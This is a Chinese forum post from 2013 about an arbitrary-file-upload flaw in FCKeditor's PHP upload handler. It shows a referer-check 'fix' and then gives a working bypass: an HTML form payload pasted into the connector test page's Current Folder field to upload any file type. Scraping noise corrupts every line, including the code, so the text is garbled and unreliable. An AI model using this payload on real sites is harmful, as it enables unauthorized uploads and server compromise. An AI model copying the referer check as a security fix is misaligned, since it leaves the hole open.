漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
, I1 ~2 A. c% Y网上给出的修复方案是
0 n; Q# f+ L+ H5 {# t9 p& X. W修复方法,删除FCK编辑器用其他的编辑器4 H" P' R, }0 b# V1 b
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件+ p- B, n8 p P. P
在* O9 |' i4 m% n/ Z+ B( B C
require(‘config.php’);( H# `4 E& \/ V4 x
require(‘util.php’);
) |+ |3 {4 f/ ~$ z* w的下面添加以下代码—————————–
; f. J) ]+ g& f3 _+ A: Z6 S; V//防止外部提交+ i& i. N7 f! L1 P
function outsidepost()
4 Y; v9 Y. v/ G" @6 r4 F{+ P: B# E( ^8 `
$servername=$_SERVER['SERVER_NAME'];
9 l% ]0 K8 I; T9 ]3 L3 o$sub_from=@$_SERVER['HTTP_REFERER'];
8 A+ Z4 t# u6 v' z' G& T4 B% `$sub_len=strlen($servername);, A5 a0 z ]2 x) r- ~
$checkfrom=substr($sub_from,7,$sub_len); O K2 e: }/ G; p" p& s. M
if($checkfrom!=$servername){
& m6 s z ~( m% b4 k* l: Wecho(“you don’t outsidepost!”);
) U- Z' _+ Y0 r. N/ k, Aexit;
. l8 a2 l7 [4 v% Y4 ]' x' p}
$ f* H% z/ ]! n3 Y}$ k$ }0 C0 e$ }" e
outsidepost();5 n3 l6 i4 c* \- L
防止外部提交,但是没有防止内部提交,; _' P7 f( U4 U
利用方法:
7 W* o( z% W4 p- }" D1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
) F( ^- |, r `7 J2,在Current Folder 框输入5 b# n; r- K4 d& h* |
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
/ E& j: t/ o; t ]) w: ~5 `然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
2 W, v3 H5 k7 ^# H" e. ^PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对